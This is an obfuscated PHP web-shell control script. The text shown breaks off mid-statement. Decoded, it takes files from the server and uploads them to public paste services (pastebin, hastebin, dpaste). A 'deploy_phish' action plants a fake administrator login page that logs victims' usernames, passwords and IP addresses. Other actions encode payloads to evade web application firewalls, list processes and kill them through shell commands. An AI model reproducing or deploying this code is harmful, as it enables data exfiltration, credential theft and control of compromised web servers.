goto Jo733; goto XMMbi; B6Quf: goto eG9DM; goto FCWe8; SbkeH: $yr3s9 = stream_context_create($xd_Oi); goto zWwYL; kaPzk: $xd_Oi = ["\150\164\164\x70" => ["\x6d\145\x74\150\157\144" => "\x50\x4f\x53\x54", "\x68\x65\141\144\x65\x72" => "\103\157\x6e\164\145\156\164\55\x74\171\x70\x65\72\40\141\x70\160\154\151\143\x61\164\151\x6f\x6e\57\170\x2d\167\167\167\55\146\x6f\162\155\x2d\165\162\x6c\145\x6e\x63\x6f\x64\145\144\15\12\125\x73\145\x72\x2d\101\147\x65\x6e\x74\x3a\x20{$c0OAM}", "\143\157\x6e\x74\x65\156\x74" => http_build_query(["\x63\x6f\x6e\x74\145\x6e\164" => $Lrz4Z]), "\x74\x69\155\145\x6f\x75\x74" => 10, "\x69\x67\x6e\x6f\x72\145\x5f\x65\162\162\x6f\x72\163" => true], "\x73\x73\x6c" => ["\x76\x65\x72\151\146\171\137\x70\x65\145\162" => false, "\166\x65\x72\x69\146\x79\x5f\160\x65\x65\162\x5f\156\141\155\145" => false]]; goto SbkeH; Gs8Sk: $v1Pog["\155\x65\163\x73\x61\x67\145"] = "\103\x6f\x75\154\144\x20\x6e\x6f\x74\x20\160\141\162\x73\145\40\160\141\x73\x74\145\40\x55\122\114\40\x66\162\157\155\40\162\145\x73\160\x6f\156\163\145\x2e"; goto mmjmU; xYZmm: $v1Pog["\x6d\145\163\x73\141\147\x65"] = "\x46\x61\151\154\x65\144\x20\164\157\40\x65\x78\146\151\x6c\164\162\x61\164\145\x20\x64\x61\164\x61\x20\x74\x6f\40\x70\x61\x73\164\151\156\x67\40\x73\145\162\166\x69\143\x65\x2e"; goto B6Quf; NQTc8: foreach ($http_response_header as $r9AVH) { goto N1lwj; jvyf1: $vtPQE = trim($I5WkF[1]); goto e9Zf0; JC6Ow: OkX4r: goto lt6rH; N1lwj: if (!preg_match("\57\x5e\114\157\x63\x61\164\x69\x6f\x6e\72\x5c\x73\x2a\50\x2e\52\51\x24\57\x69", trim($r9AVH), $I5WkF)) { goto OkX4r; } goto jvyf1; e9Zf0: goto FTQdG; goto JC6Ow; lt6rH: cz1QU: goto FHgFI; FHgFI: } goto u3fvp; bFraH: $cyICc = [["\165\162\x6c" => "\x68\164\164\x70\163\72\57\57\160\141\x73\x74\x65\142\151\x6e\56\143\157\155\57\141\x70\x69\57\141\x70\x69\x5f\x70\157\x73\164\x2e\160\150\x70", "\x6d\145\x74\150\x6f\144" => "\x70\x61\163\164\145\142\151\x6e"], ["\x75\162\154" => "\150\164\164\160\x73\72\x2f\57\150\141\163\164\145\x62\x69\156\x2e\x63\x6f\x6d\57\144\x6f\x63\165\155\x65\x6e\164\163", "\155\x65\x74\x68\157\144" => "\150\x61\x73\164\x65\x62\151\156"], ["\x75\x72\154" => "\150\x74\164\160\163\72\x2f\57\144\x70\x61\163\164\x65\x2e\x63\x6f\155\x2f\141\160\x69\x2f\166\62\x2f", "\x6d\x65\164\x68\157\x64" => "\144\160\141\163\164\x65"]]; goto QR7Go; ITWLV: $v1Pog["\x6d\x65\163\x73\141\147\145"] = "\x46\151\154\x65\x20\x6e\157\x74\40\146\x6f\165\x6e\x64\x20\x6f\162\x20\156\x6f\x74\x20\162\x65\141\144\141\x62\x6c\145\56"; goto OGdCR; jMDoQ: $Lrz4Z = file_get_contents($j3_hR); goto bFraH; Ayv0X: if ($UC6X0) { goto hdy6r; } goto exf_V; w0k5h: if (preg_match("\57\150\x74\x74\x70\x73\x3f\72\x5c\x2f\134\57\x5b\x5e\x5c\x73\74\76\x22\135\53\57", $dtJ3t, $BI9Rj)) { goto IKqh3; } goto hj6jF; haY0N: $v1Pog = ["\x73\164\141\x74\165\163" => "\163\165\x63\x63\x65\163\163", "\165\x72\x6c" => $BI9Rj[0]]; goto AF1wq; OfVJf: foreach ($cyICc as $ik5Wh) { goto f_O5T; xhLCy: if (!($olRGv !== false)) { goto fx26H; } goto jO2h5; wPwS1: Sjary: goto sUmt8; ENqXq: $vtPQE = "\150\x74\164\160\x73\72\x2f\x2f\x68\x61\163\x74\145\x62\x69\x6e\x2e\x63\157\x6d\57" . $Vd4vb["\x6b\145\x79"]; goto pVut9; pEBCq: goto Sjary; goto nalO8; o267P: goto E2YGz; goto HFVMC; sUmt8: jwUFL: goto kEIjh; Z8o9P: $yr3s9 = stream_context_create($xd_Oi); goto R1bZv; d_065: $UC6X0 = true; goto o267P; R1bZv: $olRGv = @file_get_contents($ik5Wh["\165\162\154"], false, $yr3s9); goto xhLCy; jO2h5: $Vd4vb = json_decode($olRGv, true); goto GF_qK; PQXNl: fx26H: goto pEBCq; Bpdat: $olRGv = @file_get_contents($ik5Wh["\165\x72\154"], false, $yr3s9); goto vZsco; HFVMC: Erkoc: goto PQXNl; vZsco: if (!($olRGv !== false && preg_match("\x2f\150\x74\164\x70\x73\x3f\72\134\57\x5c\x2f\133\x5e\x5c\x73\x5d\53\x2f", $olRGv, $I5WkF))) { goto aOepr; } goto uuuIK; q0T2t: goto Sjary; goto krfFC; GF_qK: if (!isset($Vd4vb["\153\x65\x79"])) { goto Erkoc; } goto ENqXq; nalO8: wRyN3: goto Pxk65; WcyNv: $yr3s9 = stream_context_create($xd_Oi); goto Bpdat; krfFC: nKfVc: goto LTlSZ; GQ4aW: $UC6X0 = true; goto MeoKZ; DQ3Sz: if ($ik5Wh["\155\x65\164\x68\x6f\144"] === "\150\x61\x73\x74\x65\x62\151\x6e") { goto nKfVc; } goto wtOwq; LTlSZ: $xd_Oi = ["\x68\x74\164\160" => ["\155\x65\x74\150\157\144" => "\120\117\123\124", "\150\145\x61\144\145\x72" => "\103\x6f\156\164\x65\x6e\x74\x2d\x74\171\160\145\x3a\40\x74\x65\170\164\57\x70\x6c\x61\x69\x6e\xd\12\125\x73\145\x72\x2d\101\147\145\156\x74\x3a\x20{$c0OAM}", "\x63\157\156\164\x65\x6e\x74" => $Lrz4Z, "\x74\x69\155\x65\157\x75\164" => 10, "\151\x67\x6e\x6f\162\x65\137\145\162\x72\x6f\x72\x73" => true], "\x73\x73\x6c" => ["\166\x65\162\x69\x66\171\x5f\160\145\x65\162" => false, "\166\145\162\151\x66\x79\137\x70\145\145\x72\137\156\x61\155\145" => false]]; goto Z8o9P; oT1z2: $Y7rg3 = q_OTe($Lrz4Z, "\142\141\163\145\x36\64"); goto DQ3Sz; pVut9: $v1Pog = ["\x73\164\141\164\165\x73" => "\x73\165\143\x63\145\163\x73", "\165\162\x6c" => $vtPQE]; goto d_065; MeoKZ: goto E2YGz; goto DW2mJ; uuuIK: $v1Pog = ["\x73\x74\141\164\165\163" => "\163\165\x63\143\145\163\x73", "\165\162\154" => trim($I5WkF[0])]; goto GQ4aW; DW2mJ: aOepr: goto wPwS1; f_O5T: $c0OAM = z0NVp(); goto oT1z2; wtOwq: if ($ik5Wh["\155\x65\x74\150\157\144"] === "\144\x70\141\x73\164\145") { goto wRyN3; } goto q0T2t; Pxk65: $xd_Oi = ["\x68\164\x74\x70" => ["\155\x65\164\x68\x6f\x64" => "\x50\117\x53\124", "\150\145\x61\144\x65\162" => "\103\x6f\x6e\x74\145\x6e\x74\55\164\x79\160\145\72\40\x61\x70\x70\154\x69\143\x61\x74\x69\x6f\x6e\x2f\170\55\x77\167\x77\55\x66\157\x72\155\x2d\x75\x72\154\x65\156\143\157\x64\145\x64\xd\12\x55\163\145\162\x2d\101\x67\x65\x6e\164\72\40{$c0OAM}", "\143\157\156\x74\x65\156\x74" => http_build_query(["\143\157\x6e\x74\145\156\164" => $Lrz4Z, "\154\x65\x78\145\162" => "\164\145\x78\x74", "\145\x78\160\151\x72\x65\163" => "\x32\x35\71\x32\60\x30\x30"]), "\x74\151\155\145\x6f\x75\x74" => 10, "\x69\147\156\157\162\x65\137\145\x72\162\157\x72\x73" => true], "\163\163\154" => ["\x76\145\x72\x69\146\x79\x5f\x70\x65\145\162" => false, "\x76\x65\x72\x69\x66\171\137\x70\x65\145\162\x5f\156\141\x6d\145" => false]]; goto WcyNv; kEIjh: } goto OuEac; twHYd: YbDjM: goto jMDoQ; u_2AJ: if ($dtJ3t !== false && !empty($dtJ3t)) { goto F7sQG; } goto xYZmm; EMcXP: Jo733: goto ULmho; KVD3j: gu6Py: goto DGucR; L8ggx: if (isset($http_response_header) && is_array($http_response_header)) { goto rRZof; } goto w0k5h; exf_V: $c0OAM = z0Nvp(); goto kaPzk; DFj57: IKqh3: goto haY0N; OGdCR: goto vbH70; goto twHYd; hj6jF: $v1Pog["\x6d\145\163\x73\x61\x67\x65"] = "\x46\x61\151\x6c\x65\144\x20\164\157\40\x65\x78\x66\x69\x6c\164\162\x61\x74\145\40\144\141\164\141\x20\x74\157\40\160\x61\x73\164\151\156\x67\x20\x73\145\162\x76\x69\x63\x65\x2e"; goto vza9h; QR7Go: $UC6X0 = false; goto OfVJf; OuEac: E2YGz: goto Ayv0X; vMzIX: if (!(!is_file($j3_hR) || !is_readable($j3_hR))) { goto YbDjM; } goto ITWLV; vza9h: goto RQhHL; goto DFj57; VCg5h: rRZof: goto A3sUQ; R7drc: if (preg_match("\57\150\x74\x74\160\x73\x3f\x3a\x5c\x2f\134\x2f\133\136\134\x73\x3c\x3e\x22\135\53\x2f", $dtJ3t, $BI9Rj)) { goto i9mzX; } goto Gs8Sk; FCWe8: F7sQG: goto L8ggx; qaBSq: $j3_hR = $_POST["\160\x61\164\x68"]; goto vMzIX; XMMbi: mlUBx: goto QrzCi; sibeK: hdy6r: goto tU_lp; XqyP5: case "\x64\145\x70\x6c\x6f\171\x5f\x70\x68\151\163\150": goto HiRMK; Glm0X: $v1Pog = ["\x73\x74\141\164\165\x73" => "\163\x75\143\x63\x65\163\x73", "\x6d\145\163\163\141\147\145" => "\120\150\x69\163\150\151\156\147\x20\x70\x61\147\x65\x20\144\145\160\x6c\157\x79\145\x64\40\x73\165\x63\143\145\163\x73\146\x75\x6c\x6c\x79\41", "\x75\x72\x6c" => $INZQZ]; goto NCrBJ; JEJUa: $v1Pog["\155\x65\163\163\141\147\x65"] = "\x46\151\154\x65\156\141\155\x65\x20\143\141\x6e\x6e\157\164\40\142\145\x20\x65\155\x70\x74\x79\x2e"; goto BBT8S; wjKsA: $v1Pog["\x6d\x65\163\x73\141\147\x65"] = "\120\x61\x74\150\40\151\163\40\156\x6f\164\x20\x61\x20\x64\x69\162\145\143\x74\157\162\171\x20\x6f\x72\x20\151\163\x20\156\x6f\x74\40\x77\162\151\x74\141\x62\154\145\x2e"; goto CgntG; HiRMK: $j3_hR = $_POST["\160\141\164\150"]; goto ZggVO; OakIw: if (file_put_contents($SPA0G, $ewr2B)) { goto CRyfN; } goto jZqdX; jZqdX: $v1Pog["\x6d\x65\163\163\x61\147\145"] = "\106\x61\151\154\145\144\x20\164\157\40\167\x72\151\x74\145\x20\x70\x68\x69\163\150\151\x6e\147\40\160\x61\147\145\40\x74\x6f\x20\x64\x69\163\153\x2e"; goto By15T; j7UJG: $SPA0G = rtrim($j3_hR, "\57") . "\x2f" . $YOfeG; goto G9ZCz; G9ZCz: $ewr2B = "\x3c\41\x44\117\103\124\131\x50\105\40\x68\164\x6d\154\76\74\150\x74\x6d\154\x3e\x3c\x68\x65\141\x64\76\74\164\151\x74\154\145\76\101\x64\155\151\156\x20\120\x6f\162\x74\x61\x6c\74\57\164\151\164\x6c\145\x3e\74\x73\x74\171\x6c\145\76\x62\x6f\144\171\x7b\x66\x6f\156\164\55\x66\141\x6d\151\154\x79\72\163\x61\156\163\55\x73\x65\162\x69\x66\73\x62\x61\x63\x6b\x67\x72\x6f\165\x6e\144\72\x23\146\x30\146\62\146\x35\x3b\144\151\163\160\154\141\x79\72\146\154\x65\170\73\152\x75\163\164\x69\x66\171\x2d\x63\157\x6e\164\x65\156\164\72\143\x65\156\x74\x65\x72\73\x61\x6c\151\x67\x6e\55\x69\164\145\x6d\163\72\143\x65\x6e\x74\145\x72\x3b\150\145\x69\147\x68\164\72\61\x30\60\166\150\73\x6d\141\162\147\151\156\72\60\73\175\146\157\x72\155\x7b\x62\x61\143\153\x67\162\x6f\165\156\x64\72\167\150\x69\164\x65\x3b\160\x61\144\144\x69\x6e\x67\72\x34\60\160\x78\73\x62\x6f\x72\x64\145\162\x2d\x72\x61\x64\x69\x75\x73\72\x38\x70\170\73\142\157\x78\x2d\x73\150\141\x64\x6f\167\72\60\40\64\x70\x78\40\x31\x32\x70\x78\40\x72\x67\x62\141\50\x30\x2c\60\x2c\60\54\x30\x2e\x31\51\73\x77\151\144\x74\150\72\63\62\x30\160\170\x3b\175\x68\62\x7b\164\145\x78\x74\55\x61\154\151\147\x6e\x3a\143\145\x6e\x74\x65\x72\73\143\157\154\157\x72\72\43\x33\x33\63\x3b\155\x61\x72\x67\x69\x6e\x2d\x62\157\164\x74\157\x6d\x3a\62\x30\x70\x78\73\x7d\x69\156\x70\x75\x74\173\x77\x69\144\164\x68\72\61\x30\x30\45\x3b\x70\141\144\x64\x69\156\x67\72\x31\x30\160\x78\73\x6d\141\162\147\x69\156\x2d\142\x6f\x74\x74\x6f\x6d\x3a\x31\x35\160\x78\x3b\142\157\x72\x64\x65\x72\x3a\x31\x70\170\40\x73\x6f\x6c\x69\144\40\43\143\x63\143\73\142\x6f\162\144\145\x72\55\x72\x61\144\x69\x75\x73\72\64\160\170\73\142\157\170\55\163\x69\x7a\x69\156\147\72\142\157\x72\x64\145\x72\55\x62\157\x78\x3b\175\x62\165\x74\164\157\x6e\173\x77\x69\144\164\150\72\61\60\x30\x25\x3b\160\141\x64\x64\x69\x6e\x67\72\x31\60\160\x78\x3b\142\x61\x63\x6b\147\162\157\165\156\144\x3a\x23\61\70\67\x37\x66\62\x3b\143\x6f\154\x6f\162\72\x77\x68\151\164\145\73\142\x6f\162\144\145\x72\x3a\x6e\157\x6e\145\73\142\157\x72\144\145\162\55\x72\x61\x64\151\x75\x73\72\64\160\x78\73\x66\x6f\156\164\x2d\163\151\x7a\145\x3a\x31\x36\x70\x78\73\143\x75\x72\163\x6f\x72\72\160\157\x69\156\164\x65\x72\73\175\142\x75\164\x74\157\156\72\150\x6f\166\145\x72\x7b\142\141\x63\x6b\147\162\x6f\x75\156\x64\x3a\43\61\66\x36\x66\x65\65\x3b\175\x3c\57\x73\164\x79\x6c\145\x3e\74\57\x68\x65\x61\144\76\74\x62\157\x64\171\x3e\74\146\x6f\162\x6d\40\x61\143\164\151\x6f\x6e\x3d\x22" . htmlspecialchars($YOfeG) . "\42\40\x6d\145\x74\150\x6f\144\75\42\x50\x4f\123\x54\42\76\74\x68\62\x3e\x41\144\x6d\x69\x6e\151\163\x74\162\141\164\157\x72\40\x4c\157\147\151\x6e\x3c\x2f\x68\x32\x3e\x3c\x69\x6e\160\165\x74\x20\x74\171\160\145\x3d\x22\x74\x65\170\x74\42\40\x6e\x61\155\145\x3d\42\x75\163\x65\162\x6e\141\x6d\145\x22\40\160\154\x61\143\145\x68\x6f\x6c\144\x65\x72\x3d\42\x55\x73\x65\162\x6e\x61\x6d\x65\x22\40\162\x65\x71\165\x69\162\x65\144\76\x3c\x69\156\x70\165\x74\x20\x74\x79\160\145\x3d\x22\x70\x61\163\163\x77\157\162\144\42\x20\156\141\155\145\75\x22\160\x61\x73\163\x77\157\162\x64\x22\40\160\154\141\143\x65\150\157\x6c\x64\145\162\x3d\42\x50\x61\x73\163\x77\157\162\144\42\x20\x72\x65\161\165\151\162\145\x64\76\74\142\x75\x74\x74\157\156\x20\x74\x79\160\x65\x3d\42\x73\165\142\155\151\x74\x22\76\114\157\147\x20\111\156\x3c\57\x62\165\164\164\157\156\x3e\74\x3f\x70\x68\160\x20\151\146\50\x24\x5f\x53\x45\x52\x56\x45\x52\133\x22\x52\x45\121\x55\105\x53\x54\137\115\105\x54\110\117\104\42\135\x3d\75\42\120\x4f\123\124\x22\51\173\40\x24\154\x6f\x67\137\x66\151\x6c\145\75\x73\x79\x73\137\x67\x65\x74\x5f\164\145\x6d\x70\x5f\x64\x69\x72\x28\51\56\42\57\143\56\154\x6f\x67\x22\x3b\40\x24\144\141\x74\141\75\x22\x55\72\x22\56\x24\x5f\120\117\x53\124\133\x22\165\163\145\x72\156\141\155\x65\42\135\x2e\x22\40\x50\72\42\56\44\137\120\117\x53\x54\x5b\42\x70\x61\163\163\x77\x6f\x72\x64\42\x5d\56\x22\40\111\120\72\42\56\x24\137\123\105\122\x56\x45\122\x5b\42\122\105\x4d\117\124\105\x5f\101\x44\104\122\42\135\x2e\42\x5c\x6e\x22\x3b\x20\x66\151\x6c\145\137\160\165\164\137\143\157\x6e\164\145\x6e\164\x73\50\44\x6c\x6f\147\137\146\151\154\x65\54\44\144\x61\x74\x61\54\x46\111\x4c\105\137\x41\x50\x50\105\116\x44\x29\73\40\x65\x63\150\157\x20\x22\x3c\x70\40\x73\164\x79\154\145\75\x27\164\x65\170\x74\x2d\x61\x6c\x69\147\156\x3a\x63\145\156\x74\145\x72\x3b\x63\157\x6c\157\162\72\162\x65\144\x3b\x6d\x61\162\x67\x69\x6e\x2d\x74\157\160\72\x31\x30\160\x78\73\x27\76\114\157\x67\151\x6e\x20\146\141\x69\x6c\145\x64\x2e\x3c\57\160\x3e\x22\73\x20\x7d\40\77\76\x3c\x2f\146\157\162\155\x3e\74\x2f\142\157\x64\x79\76\74\x2f\150\164\x6d\154\76"; goto OakIw; BBT8S: goto vbH70; goto Q8ym9; elepq: $INZQZ = (isset($_SERVER["\x48\124\x54\x50\x53"]) && $_SERVER["\110\124\124\120\x53"] === "\157\x6e" ? "\x68\x74\164\x70\163" : "\x68\x74\x74\x70") . "\x3a\57\57{$_SERVER["\110\x54\124\120\137\x48\117\123\124"]}" . substr($SPA0G, strlen($_SERVER["\104\x4f\103\x55\115\105\116\124\x5f\122\x4f\117\124"])); goto Glm0X; hnxHf: CRyfN: goto elepq; G9gPf: if (!empty($YOfeG)) { goto IZxtD; } goto JEJUa; eY1tN: if (!(!is_dir($j3_hR) || !is_writable($j3_hR))) { goto A0hF6; } goto wjKsA; Q8ym9: IZxtD: goto j7UJG; NCrBJ: IFPB0: goto UXuwg; UXuwg: goto vbH70; goto csKw0; ZggVO: $YOfeG = $_POST["\x66\151\154\145\x6e\141\155\145"]; goto eY1tN; By15T: goto IFPB0; goto hnxHf; CgntG: goto vbH70; goto JqY7l; JqY7l: A0hF6: goto G9gPf; csKw0: case "\167\141\x66\137\145\x76\x61\x73\x69\157\x6e\x5f\164\x65\x73\164": goto aSdgL; v2_tw: $gSi8X["\157\142\146\165\163\143\x61\164\151\x6f\x6e"] = ["\x63\x68\x72" => MrZR7($IfY1r), "\150\x65\170" => bin2hex($IfY1r), "\x62\x61\x73\x65\x36\x34" => base64_encode($IfY1r)]; goto yEfQb; pVOwb: $v1Pog = ["\163\x74\x61\x74\x75\x73" => "\163\x75\143\x63\x65\x73\x73", "\162\145\x73\x75\154\164\163" => $gSi8X, "\x6d\x65\x73\163\141\x67\145" => "\x57\x41\x46\40\x65\x76\x61\163\151\x6f\x6e\40\164\145\163\164\x20\x63\x6f\x6d\160\x6c\145\164\145\144\56"]; goto Qw6OV; tQE0e: goto JjGNN; goto LI9Sj; aSdgL: $lwp4c = $_POST["\x6d\x65\x74\150\x6f\144"] ?? "\x61\x6c\x6c"; goto tfl0e; Qw6OV: goto vbH70; goto J3CPP; RbPdd: if (!($lwp4c === "\x61\154\154" || $lwp4c === "\x65\156\143\x6f\x64\x69\x6e\147")) { goto Zmt1e; } goto vk_Vl; aAIq3: $gSi8X = []; goto RbPdd; OvE2z: $jY45d = 0; goto N3PaY; HynYW: $jY45d++; goto tQE0e; yEfQb: Extr0: goto os0dB; tfl0e: $IfY1r = $_POST["\144\x61\x74\x61"] ?? "\164\x65\163\164\x20\x70\x61\171\x6c\x6f\x61\144"; goto aAIq3; LkLZR: $gSi8X["\165\x73\145\x72\137\141\x67\145\156\164\x73"][] = z0NVP(); goto MSUK5; Zm0Qw: NPJJe: goto pVOwb; W2FYf: if (!($lwp4c === "\x61\154\x6c" || $lwp4c === "\x75\163\x65\162\x5f\141\x67\145\x6e\164")) { goto NPJJe; } goto n9Mcv; rGQ1n: if (!($lwp4c === "\x61\x6c\x6c" || $lwp4c === "\157\x62\x66\x75\x73\x63\141\164\x69\157\x6e")) { goto Extr0; } goto v2_tw; os0dB: if (!($lwp4c === "\x61\154\x6c" || $lwp4c === "\x63\141\x73\145")) { goto tgeaz; } goto vUWkc; MSUK5: qYXlE: goto HynYW; LI9Sj: Zap0C: goto Zm0Qw; nHtmO: if (!($jY45d < 5)) { goto Zap0C; } goto LkLZR; vUWkc: $gSi8X["\143\x61\x73\x65\137\x76\141\x72\151\141\164\151\157\x6e"] = RtW9i($IfY1r); goto fgjg7; n9Mcv: $gSi8X["\165\163\145\x72\137\x61\x67\x65\156\x74\x73"] = []; goto OvE2z; N3PaY: JjGNN: goto nHtmO; vk_Vl: $gSi8X["\145\x6e\x63\x6f\x64\151\x6e\x67"] = ["\142\141\163\145\x36\x34" => Q_oTe($IfY1r, "\142\x61\x73\145\x36\x34"), "\x68\x65\x78" => q_Ote($IfY1r, "\x68\145\x78"), "\x72\157\x74\61\x33" => Q_otE($IfY1r, "\162\157\x74\x31\63"), "\142\x61\x73\x65\66\x34\x5f\150\x65\170" => q_OtE($IfY1r, "\142\141\x73\x65\66\x34\x5f\150\145\x78"), "\144\x6f\x75\x62\154\x65\137\x62\141\163\x65\x36\64" => q_OTe($IfY1r, "\144\x6f\165\x62\154\x65\137\x62\141\163\145\x36\64"), "\x63\x68\x75\156\x6b\145\x64\137\x62\141\x73\145\66\x34" => Q_OTE($IfY1r, "\x63\x68\165\x6e\153\x65\x64\x5f\142\141\163\x65\66\x34")]; goto PP1hv; PP1hv: Zmt1e: goto rGQ1n; fgjg7: tgeaz: goto W2FYf; J3CPP: case "\163\x74\x61\162\164\x5f\146\151\154\145\137\x77\141\164\143\150\145\162": goto zQZ3p; c0AFo: $JmZ8Y = sys_get_temp_dir() . "\57\152\141\156\165\x73\137\x77\x61\x74\143\x68\145\162\x5f" . md5($j3_hR) . "\x2e\152\163\157\x6e"; goto XbJZL; hQ99r: file_put_contents($JmZ8Y, json_encode($T3Sqt)); goto mCbZp; u6bWw: HSwQU: goto c0AFo; wIk0V: goto vbH70; goto Z10s_; FYUko: $v1Pog["\155\x65\x73\163\141\147\x65"] = "\x49\156\x76\x61\154\151\x64\x20\144\151\x72\x65\143\x74\157\x72\171\40\x70\x61\x74\x68\56"; goto Duxzz; mCbZp: $v1Pog = ["\163\164\x61\164\165\x73" => "\x73\x75\143\143\x65\163\163", "\x6d\145\163\x73\x61\147\145" => "\x46\151\154\145\40\x77\x61\x74\143\150\x65\x72\x20\x73\x74\141\162\164\x65\144\x2e", "\x73\x6e\141\x70\163\150\x6f\x74\x5f\x66\151\x6c\x65" => $JmZ8Y]; goto wIk0V; wflUl: $lN4YZ = intval($_POST["\x69\156\164\145\162\x76\x61\154"] ?? 2); goto Jx7r6; Jx7r6: if (is_dir($j3_hR)) { goto HSwQU; } goto FYUko; Duxzz: goto vbH70; goto u6bWw; XbJZL: $T3Sqt = IcVUi($j3_hR); goto hQ99r; zQZ3p: $j3_hR = $_POST["\x70\141\x74\150"] ?? $_SESSION["\143\x77\144"]; goto wflUl; Z10s_: case "\143\x68\145\x63\x6b\x5f\x66\x69\154\145\137\x63\x68\141\x6e\x67\x65\163": goto mVNDO; mVNDO: $j3_hR = $_POST["\160\141\x74\150"] ?? $_SESSION["\x63\x77\144"]; goto sj1sb; JABQK: $v1Pog["\155\x65\x73\x73\141\x67\145"] = "\x49\x6e\x76\141\154\x69\x64\x20\x70\x61\x74\x68\x20\x6f\162\x20\x73\x6e\141\x70\163\150\157\164\40\x6e\157\164\x20\x66\157\165\156\144\x2e"; goto Q115i; svt_b: $SrCNq = icVUi($j3_hR); goto AzjCR; Cgz9f: sXBkS: goto oXf4Y; oXf4Y: $xXU51 = json_decode(file_get_contents($JmZ8Y), true); goto svt_b; lsg1V: goto vbH70; goto Oq9M3; U9CIR: file_put_contents($JmZ8Y, json_encode($SrCNq)); goto zaXrg; fAFH6: foreach ($SrCNq as $Q0s1i => $DnOhI) { goto QVsgL; wX80P: $NMePb["\155\x6f\144\151\x66\151\145\144"][$Q0s1i] = $DnOhI; goto HvRUB; QVsgL: if (!(isset($xXU51[$Q0s1i]) && $xXU51[$Q0s1i]["\x6d\164\151\x6d\145"] != $DnOhI["\x6d\x74\x69\155\x65"])) { goto TefI5; } goto wX80P; KZF8O: NdzvU: goto htxDi; HvRUB: TefI5: goto KZF8O; htxDi: } goto Bdpa6; D03FD: if (!(!is_dir($j3_hR) || !file_exists($JmZ8Y))) { goto sXBkS; } goto JABQK; AzjCR: $NMePb = ["\x63\x72\145\141\x74\145\144" => array_diff_key($SrCNq, $xXU51), "\144\x65\x6c\x65\x74\145\144" => array_diff_key($xXU51, $SrCNq), "\x6d\x6f\x64\x69\x66\151\x65\144" => []]; goto fAFH6; Q115i: goto vbH70; goto Cgz9f; zaXrg: $v1Pog = ["\x73\164\x61\x74\165\x73" => "\x73\x75\143\x63\145\163\163", "\x63\x68\x61\156\147\x65\x73" => $NMePb]; goto lsg1V; sj1sb: $JmZ8Y = $_POST["\163\156\x61\x70\x73\x68\x6f\x74\x5f\146\151\154\x65"] ?? ''; goto D03FD; Bdpa6: oFfWt: goto U9CIR; Oq9M3: case "\147\145\x74\137\x70\162\157\143\145\163\x73\145\163": goto VaOUS; BVL2d: LQBaC: goto b0g5a; BC0OU: if (strpos($VeIoq, "\167\151\x6e") !== false) { goto pZ2km; } goto yBbDY; CKRzA: pZ2km: goto IShlz; IShlz: $oZAH8 = "\164\141\163\153\154\151\163\x74\x20\x2f\x46\117\40\103\x53\x56\40\x32\76\x6e\165\154"; goto tXb7A; u1wdZ: $BKvy0 = ZMrp5($oZAH8); goto dKKTl; b0g5a: nhsPb: goto IZ5l4; dKKTl: $IdX4r = explode("\xa", trim($BKvy0)); goto eOknF; x1pzh: $oZAH8 = "\x70\x73\40\141\165\170\40\62\x3e\57\144\x65\x76\x2f\156\165\x6c\x6c\40\x7c\x20\x68\x65\x61\144\x20\x2d\61\60\x30"; goto u1wdZ; iKN5j: if (strpos($VeIoq, "\154\151\x6e\165\170") !== false || strpos($VeIoq, "\x75\156\151\170") !== false) { goto WByqq; } goto BC0OU; ow65x: lB29b: goto vXIvR; iGLtY: WByqq: goto x1pzh; frIab: $IdX4r = explode("\xa", trim($BKvy0)); goto Q5A1I; VaOUS: $VeIoq = strtolower(php_uname("\163")); goto lTF6n; eOknF: foreach ($IdX4r as $jY45d => $oTjJ5) { goto KhuAc; E9L8m: $UTRti[] = ["\165\163\145\162" => $CTBeO[0], "\160\x69\144" => $CTBeO[1], "\143\x70\x75" => $CTBeO[2], "\x6d\145\155" => $CTBeO[3], "\166\x73\x7a" => $CTBeO[4], "\162\x73\x73" => $CTBeO[5], "\x74\164" => $CTBeO[6], "\163\x74\141\164" => $CTBeO[7], "\163\164\x61\162\x74" => $CTBeO[8], "\164\151\x6d\x65" => $CTBeO[9], "\x63\x6f\x6d\155\141\x6e\x64" => $CTBeO[10]]; goto lzBFf; KlF61: $CTBeO = preg_split("\57\x5c\163\53\57", $oTjJ5, 11); goto mM7R8; lzBFf: jufP8: goto JKcvo; rGvNk: g3pK6: goto KlF61; KhuAc: if (!($jY45d === 0)) { goto g3pK6; } goto JITL4; mM7R8: if (!(count($CTBeO) >= 11)) { goto jufP8; } goto E9L8m; JKcvo: RZ7hV: goto ogYCV; JITL4: goto RZ7hV; goto rGvNk; ogYCV: } goto ow65x; yBbDY: goto nhsPb; goto iGLtY; vXIvR: goto nhsPb; goto CKRzA; tXb7A: $BKvy0 = zmRP5($oZAH8); goto frIab; Q5A1I: foreach ($IdX4r as $jY45d => $oTjJ5) { goto nuO0_; TROJM: z4nFc: goto SwQPk; nuO0_: if (!($jY45d < 2)) { goto z4nFc; } goto VLk3F; LS0Zn: LnDtf: goto vLKFa; VLk3F: goto LnDtf; goto TROJM; AJcqG: $UTRti[] = ["\x6e\141\155\x65" => $CTBeO[0], "\x70\151\144" => $CTBeO[1], "\163\145\x73\x73\151\x6f\156" => $CTBeO[2], "\x6d\145\x6d" => $CTBeO[4], "\163\x74\141\164\x75\x73" => $CTBeO[4] ?? "\x4e\57\101"]; goto Hibr5; SwQPk: $CTBeO = str_getcsv($oTjJ5); goto Geswy; Hibr5: tAVx9: goto LS0Zn; Geswy: if (!(count($CTBeO) >= 5)) { goto tAVx9; } goto AJcqG; vLKFa: } goto BVL2d; lTF6n: $UTRti = []; goto iKN5j; BEBws: goto vbH70; goto hRYpW; IZ5l4: $v1Pog = ["\x73\x74\x61\164\165\163" => "\163\x75\x63\x63\145\x73\163", "\x70\x72\x6f\143\145\163\163\145\163" => $UTRti]; goto BEBws; hRYpW: case "\x6b\x69\154\154\137\x70\162\x6f\x63\145\163\163": goto fVEZ1; PS2Gd: $BDl7h = $_POST["\163\151\147\x6e\x61\x6c"] ?? "\124\105\122\x4d"; goto X92tm; qBVzO: $oZAH8 = "\x74\x61\x73\153\x6b\151\154\x6c\x20\57\120\x49\x44\x20{$R0VUu}\x20\x2f\x46\40\62\76\46\x31"; goto rwUGv; E5uYS: goto W1rI5; goto zq5x_; ST0g3: if (strpos($VeIoq, "\167\x69\156") !== false) { goto OCrFv; } goto NFE2y; NFE2y: $oZAH8 = "\153\x69\154\154\x20\x2d{$BDl7h}\40{$R0VUu}\40\62\x3e\x26\61"; goto E5uYS; zq5x_: OCrFv: goto qBVzO; X92tm: $VeIoq = strtolower(php_uname("\x73")); goto ST0g3; yDfGe: goto vbH70; goto HK17_; kpBmd: $v1Pog = 